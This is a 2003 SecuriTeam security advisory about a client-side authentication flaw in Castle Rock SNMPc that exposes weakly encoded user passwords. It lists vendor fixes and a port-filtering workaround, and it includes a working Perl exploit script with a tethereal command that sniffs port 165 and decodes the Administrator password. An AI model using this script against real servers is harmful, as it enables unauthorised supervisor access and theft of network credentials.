[NT] Castle Rock Computing SNMPc Remote Vulnerability

From: SecuriTeam (support_at_securiteam.com)
Date: 08/27/03

  • Next message: SecuriTeam: "[UNIX] newsPHP Arbitrary File Inclusion and Insufficient Login Validation" 
    To: list@securiteam.com
Date: 27 Aug 2003 10:25:24 +0200

    The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
    - - promotion

    The SecuriTeam alerts list - Free, Accurate, Independent.

    Get your security news from a reliable source.
    http://www.securiteam.com/mailinglist.html

    - - - - - - - - -

      Castle Rock Computing SNMPc Remote Vulnerability
    ------------------------------------------------------------------------

    SUMMARY

     <http://www.castlerock.com/> Castle Rock Computing SNMPc is "a
    general-purpose Distributed Network Manager by Castle Rock Computing that
    suitable as a cost-effective solution for small and middle-range
    networks". Due to weak authentication protocol, any remote user can gain
    Supervisor access to SNMPc server.

    DETAILS

    Vulnerable systems:
     * SNMPc versions up to and including 6.0.8

    As for SNMPc is distributed system it consists of several components.
    Server components execute at a centralized computer and maintain
    centralized databases, including configuration, map topology, event log
    files, and user information. User must start a remote login Console or
    JAVA console to view and control the SNMPc system. Authentication scheme
    used by remote console is rather simple - all authentication processes are
    done at the client side.

    During login phase, after some initial exchange (probably version
    negotiation) remote console sends username to server. Server replies with
    block of user's data - username, real name, phone number, user's group
    etc. exactly as it is stored in internal database in file ntuserdb.dat.
    This also includes user's password "encrypted" with some variation of
    simple substitution. Thus, actual password of any known user can be easily
    revealed.

    Fortunately, to attacker there is default user Administrator, which cannot
    be deleted. Administrator's Supervisor privileges cannot be lowered.

    Impact:
    As for SNMP read/write community of network devices, network structure and
    other sensitive information can be stored in NMS database this can be
    serious security problem.

    Workaround:
    Use packet filter in order to allow only trusted workstations connect to
    SNMPc server. SNMPc listens on UDP ports 162, 164 and TCP ports 165, 166,
    167, 168, 12421. 162/udp listens for generic SNMP traps from network
    devices, 165/tcp used by remote login console, 12421 by JAVA console.
    Given exploit needs only 165/tcp to work. JAVA version of console is not
    tested and can be vulnerable.

    Solution:
    Castle Rock Computing created a fix, which prevents active attacks.

    The client should send the user information to the server and have the
    server perform the login verification.

    A fix for version 6.0 is posted at the following locations:
     <http://www.castlerock.com/download/fix821_608.zip>
    http://www.castlerock.com/download/fix821_608.zip (version 6.0.8)
     <http://www.castlerock.com/download/fix821_605.zip>
    http://www.castlerock.com/download/fix821_605.zip (version 6.0.5)

    Stop SNMPc and unzip the appropriate file into the SNMPc server install
    directory.

    For version 5.1, a full release is available at:
     <http://www.castlerock.com/download/snmpc519.exe>
    http://www.castlerock.com/download/snmpc519.exe

    Vendor status:
    2003-08-11 - We notified Castle Rock Computing helpdesk about
    vulnerability in version 6.x.
    2003-08-14 - Castle Rock Computing created a fix.

    Exploit:
    Here is simple script that demonstrates this vulnerability. You need SNMPc
    remote login console, Ethereal and some flavor of perl (say Cygwin)
    installed on your Windows workstation in order this exploit to work. Run
    it as follows
    "C:\Program Files\Ethereal\tethereal.exe" -lnV port 165 |
    C:\cygwin\bin\perl.exe 0wn-snmpc.pl

    Try to login to server as Administrator with empty password.
    As for space is valid symbol in password this script will print
    'decrypted' password limited by semicolons.

    #!/usr/bin/perl
    $str='.YZ[\]^_PQRSTUVWHIJKLMNO@ABCDEFGxyz{|}~.pqrstuvwhijklmno`abcdefg................................89:;<=>?01234567()*+,-./ !"#$%&\'................................................................................................................................';
    while(<>)
    {
       $s="";
       if(/^0130 /){
         GETIT: {
     do {
           s/^0130 00 00 // if /^0130/;
           s/^[[:xdigit:]]{4} //;
           s/ .*$//ms;
           $s=$s." ".$_;
           last GETIT if ($s =~ / 00/);
         } while (<>)
    };
         $s=~s/ 00.*$//ms;
         $s=~s/ ([[:xdigit:]]{2}) ([[:xdigit:]]{2})/
    substr($str,(hex($1)),1).substr($str,(hex($2)),1) /ige;
         $s=~s/ ([[:xdigit:]]{2})/ chr(hex($1)) /ige;
         print ":$s:\n";
       }
     }

    ADDITIONAL INFORMATION

    The information has been provided by <mailto:sawny@multimedia.ru>
    Alexander V. Nickolenko.

    ========================================

    This bulletin is sent to members of the SecuriTeam mailing list.
    To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
    In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com

    ====================
    ====================

    DISCLAIMER:
    The information in this bulletin is provided "AS IS" without warranty of any kind.
    In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.

  • Next message: SecuriTeam: "[UNIX] newsPHP Arbitrary File Inclusion and Insufficient Login Validation"

    Relevant Pages